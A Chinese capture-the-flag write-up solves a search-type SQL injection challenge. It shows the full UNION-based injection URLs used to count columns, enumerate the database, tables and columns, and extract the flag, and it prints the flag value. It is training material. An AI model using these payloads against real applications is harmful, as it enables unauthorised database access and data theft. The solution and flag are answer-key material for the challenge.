SQL注入:搜索型注入
like语法
"%"匹配任何字符, "like"的意思就是像, "$" 变量
SQL语句:select username,id from admin where username like '%$name%'
进入靶场后出现此界面,在登录界面输入1’判断一下是数字型还是字符型。
页面下方出现账号密码错误或用户未注册!那先注册,后登录。
判断是否有注入点
搜索框内 输入a正常回显
输入a’报错
猜解列名数量(字段数)
URL地址中输入a' order by 1 # 报错
http://47.103.94.191:8015/sqli_1.php?title=a' order by 1 # &action=search
URL地址中输入a’’/a% order by 1 #正常回显,却无法判断字段数,也无法查看报错位。我们尝试把注释符#换成--+,正常回显
http://47.103.94.191:8015/sqli_1.php?title=a' order by 1 --+ &action=search
8页面显示不正常,发现最大正常位是7
查看报错位(2,3,4,5报错)
http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,2,3,4,5,6,7 --+ &action=search
获取数据库信息
获取数据库名称(whalwl)
数据库表的信息(blog,heroes,movies,this_flag,users,visitors)
http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,database(),3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=database() --+ &action=search
查找this_flag表下的列
数据库列的信息:id,num,flag
http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,database(),3,4,group_concat(column_name),6,7 from information_schema.columns where table_name='this_flag' --+ &action=search
获取flag
http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,database(),3,4,flag,6,7 from whalwl.this_flag --+ &action=search
提交flag
flag{86b757e867b43d16050225ab516b2274}
SQL注入:搜索型注入相关推荐
- Pikachu靶场-SQL注入-搜索型注入过关步骤
Pikachu靶场-SQL注入-搜索型注入过关步骤 首先要明白MySQL数据库模糊搜索的语句,like '常%'.like '%常'.like '%常%' 这个几个,这里就不详说这个语句了 判断注入点 ...
- SQL注入-整型注入实例
发现存在SQL注入的站点有很多都是PHP,估计是PHP的占有率太大了,而且建站方便效率高,这就和ios和安卓一样,始终认为安卓安全性差,win和linux,mac一样,始终认为win的安全性差,毕竟占 ...
- SQL注入之MySQL注入学习笔记(二)
补充:MySQL注释方法 文章目录 MySQL注入 基本介绍 字符型 数字型 搜索型 Cookie注入 HTTP头注入 具体实例 数字型注入 一般类型 被单引号包裹起来的 双引号加小括号包裹 两个括号 ...
- mysql sql注入工具_SQL注入工具实践
程序简介 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入. ...
- SQL注入——联合查询注入
0x01 SQL注入的原理 针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原 有SQL结构,达到编写程序时意料之外结果的攻击行为.其成因可以归结外一下 两个原因叠加造成的: 1 ...
- python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现
通过前面payload的构造,不难发现,对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的.这些payload语句虽然复杂,但大部分内容都是相同的,因此,一言不合就写了个脚本自动化注入, ...
- 山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(七)-SQL注入字符型
目录 前言: 一.简介 二.项目配置 三.代码编写 四.运行测试 前言: 前面完成了 SQL 注入漏洞的数字型输入,其实 SQL 注入漏洞还有很多其他类型的注入,例如:字符型注入.宽字节注入等,相应的 ...
- SQL注入之字符型注入练习(pikachu)
SQL注入之字符型 实现目标:获取到pikachu下的表.数据信息 靶场:pikachu =>sql-inject=>字符型注入 2.实验步骤 第一步目标:拿到数据库名 2.1确定请求方法 ...
- web安全入门之SQL注入-时间型盲注
SQL注入之时间型盲注 1.时间型盲注 时间型盲注条件极为苛刻,不管输入什么,WEB页面回显相同的结果,此时我们无法通过报错型注入以及布尔型盲注来爆数据,此时数据在交互完成以后目标网站没有正确和错误的 ...
最新文章
- HttpWatch7.0测试工具
- 实体类中存在List集合,怎么在xml文件中,对应
- Hollis原创|深入分析Java的编译原理
- matlab实现photoshop,photoshop图像滤镜——素描算法(含matlab代码)
- uos系统虚拟机_体验中兴深度联合推出的「UOS」统一操作系统
- 站在信息安全角度 人脸识别面临五大问题
- 构架https服务器
- 【EMC专题】共模和差模
- Android Studio Menu item 的简单使用
- 一花一世界,在微服务中定义边界
- 要求用 100 元买 100 只鸡,其中公鸡五元一只,母鸡三元一只,小鸡 1 元三只,规定每种至少买一 只
- 【OpenCV + Python】之bitwise_and、bitwise_not,bitwise_xor等图像基本运算(opencv位操作)
- 【年度总结】满船清梦压星河
- 可以玩所有游戏的计算机配置,笔者教你玩大型游戏的电脑配置
- java jlabel图片大小_java – 调整图片大小以适应JLabel
- 土谷贞雄将携中日知名建筑师在深圳展示都市社群规划成功案例
- opencv 区域生长(种子自动选取)python
- 成都超级计算机中心玻璃,全球前十的成都超算中心计算能力大比拼!看看它到底有多厉害?...
- 【转】隐函数绘制并提取数据
- 2个鸡蛋100楼问题